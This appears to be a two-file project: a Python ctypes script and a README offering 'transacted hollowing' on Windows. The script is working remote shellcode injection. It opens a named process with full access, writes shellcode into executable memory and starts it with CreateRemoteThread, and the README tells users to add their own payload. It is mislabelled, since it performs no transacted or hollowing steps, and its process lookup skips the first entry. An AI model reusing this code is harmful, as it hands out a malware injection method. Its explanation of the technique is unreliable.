[
    {
        "file_name": "transacted_hollowing.py",
        "file_content": "# transacted_hollowing.py\n\nimport ctypes\nimport os\nimport sys\nfrom ctypes import wintypes\n\n# Load the necessary Windows API functions\nkernel32 = ctypes.WinDLL('kernel32', use_last_error=True)\nntdll = ctypes.WinDLL('ntdll', use_last_error=True)\n\n# Define the necessary structures and constants\nPROCESS_ALL_ACCESS = 0x001F0FFF\nTH32CS_SNAPPROCESS = 0x00000002\nTH32CS_SNAPMODULE = 0x00000008\n\nclass PROCESSENTRY32(ctypes.Structure):\n    _fields_ = [\n        (\"dwSize\", wintypes.DWORD),\n        (\"cntUsage\", wintypes.DWORD),\n        (\"th32ProcessID\", wintypes.DWORD),\n        (\"th32DefaultHeapID\", wintypes.PULONG),\n        (\"th32ModuleID\", wintypes.DWORD),\n        (\"cntThreads\", wintypes.DWORD),\n        (\"th32ParentProcessID\", wintypes.DWORD),\n        (\"pcPriClassBase\", wintypes.LONG),\n        (\"dwFlags\", wintypes.DWORD),\n        (\"szExeFile\", wintypes.CHAR * 260)\n    ]\n\nclass MODULEENTRY32(ctypes.Structure):\n    _fields_ = [\n        (\"dwSize\", wintypes.DWORD),\n        (\"th32ModuleID\", wintypes.DWORD),\n        (\"th32ProcessID\", wintypes.DWORD),\n        (\"GlblcntUsage\", wintypes.DWORD),\n        (\"ProccntUsage\", wintypes.DWORD),\n        (\"modBaseAddr\", wintypes.LPVOID),\n        (\"modBaseSize\", wintypes.DWORD),\n        (\"hModule\", wintypes.HMODULE),\n        (\"szModule\", wintypes.CHAR * 256),\n        (\"szExePath\", wintypes.CHAR * 260)\n    ]\n\n# Function to get the process ID by name\ndef get_process_id_by_name(process_name):\n    hSnapshot = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)\n    if hSnapshot == -1:\n        raise ctypes.WinError(ctypes.get_last_error())\n\n    pe32 = PROCESSENTRY32()\n    pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)\n\n    if not kernel32.Process32First(hSnapshot, ctypes.byref(pe32)):\n        kernel32.CloseHandle(hSnapshot)\n        raise ctypes.WinError(ctypes.get_last_error())\n\n    while kernel32.Process32Next(hSnapshot, ctypes.byref(pe32)):\n        if pe32.szExeFile.decode('utf-8') == process_name:\n            kernel32.CloseHandle(hSnapshot)\n            return pe32.th32ProcessID\n\n    kernel32.CloseHandle(hSnapshot)\n    return None\n\n# Function to get the module base address by process ID and module name\ndef get_module_base_address(process_id, module_name):\n    hSnapshot = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPPROCESS, process_id)\n    if hSnapshot == -1:\n        raise ctypes.WinError(ctypes.get_last_error())\n\n    me32 = MODULEENTRY32()\n    me32.dwSize = ctypes.sizeof(MODULEENTRY32)\n\n    if not kernel32.Module32First(hSnapshot, ctypes.byref(me32)):\n        kernel32.CloseHandle(hSnapshot)\n        raise ctypes.WinError(ctypes.get_last_error())\n\n    while kernel32.Module32Next(hSnapshot, ctypes.byref(me32)):\n        if me32.szModule.decode('utf-8') == module_name:\n            kernel32.CloseHandle(hSnapshot)\n            return me32.modBaseAddr\n\n    kernel32.CloseHandle(hSnapshot)\n    return None\n\n# Function to open a process with the specified access rights\ndef open_process(process_id, access_rights):\n    hProcess = kernel32.OpenProcess(access_rights, False, process_id)\n    if not hProcess:\n        raise ctypes.WinError(ctypes.get_last_error())\n    return hProcess\n\n# Function to allocate memory in the target process\ndef allocate_memory(hProcess, size):\n    addr = kernel32.VirtualAllocEx(hProcess, None, size, 0x1000 | 0x2000, 0x40)\n    if not addr:\n        raise ctypes.WinError(ctypes.get_last_error())\n    return addr\n\n# Function to write data to the allocated memory in the target process\ndef write_memory(hProcess, address, data):\n    bytes_written = wintypes.SIZE_T()\n    if not kernel32.WriteProcessMemory(hProcess, address, data, len(data), ctypes.byref(bytes_written)):\n        raise ctypes.WinError(ctypes.get_last_error())\n    return bytes_written.value\n\n# Function to create a remote thread in the target process\ndef create_remote_thread(hProcess, start_address, parameter):\n    hThread = kernel32.CreateRemoteThread(hProcess, None, 0, start_address, parameter, 0, None)\n    if not hThread:\n        raise ctypes.WinError(ctypes.get_last_error())\n    return hThread\n\n# Function to perform transacted hollowing\ndef transacted_hollowing(target_process_name, target_module_name, shellcode):\n    # Get the process ID of the target process\n    process_id = get_process_id_by_name(target_process_name)\n    if not process_id:\n        raise Exception(f\"Process {target_process_name} not found.\")\n\n    # Open the target process\n    hProcess = open_process(process_id, PROCESS_ALL_ACCESS)\n\n    # Get the base address of the target module\n    module_base_address = get_module_base_address(process_id, target_module_name)\n    if not module_base_address:\n        raise Exception(f\"Module {target_module_name} not found in process {target_process_name}.\")\n\n    # Allocate memory for the shellcode in the target process\n    shellcode_address = allocate_memory(hProcess, len(shellcode))\n\n    # Write the shellcode to the allocated memory\n    write_memory(hProcess, shellcode_address, shellcode)\n\n    # Create a remote thread in the target process to execute the shellcode\n    create_remote_thread(hProcess, shellcode_address, 0)\n\n    print(f\"Transacted hollowing successful. Shellcode executed in process {target_process_name}.\")\n\n# Example usage\nif __name__ == \"__main__\":\n    # Example shellcode (this should be replaced with actual shellcode)\n    shellcode = b\"\\x90\" * 100  # NOP sled for demonstration purposes\n\n    # Perform transacted hollowing\n    transacted_hollowing(\"notepad.exe\", \"notepad.exe\", shellcode)"
    },
    {
        "file_name": "README.md",
        "file_content": "# Transacted Hollowing Implementation\n\nThis project demonstrates how to perform transacted hollowing on a target process using Python. Transacted hollowing involves replacing the memory of a target process with custom shellcode, effectively \"hollowing out\" the original code and injecting new functionality.\n\n## Files\n\n- `transacted_hollowing.py`: The main script that performs transacted hollowing.\n- `README.md`: This file, providing an overview and instructions.\n\n## Requirements\n\n- Python 3.x\n- Windows operating system\n\n## Usage\n\n1. Replace the example shellcode in the `transacted_hollowing` function with your actual shellcode.\n2. Run the script:"
    }
]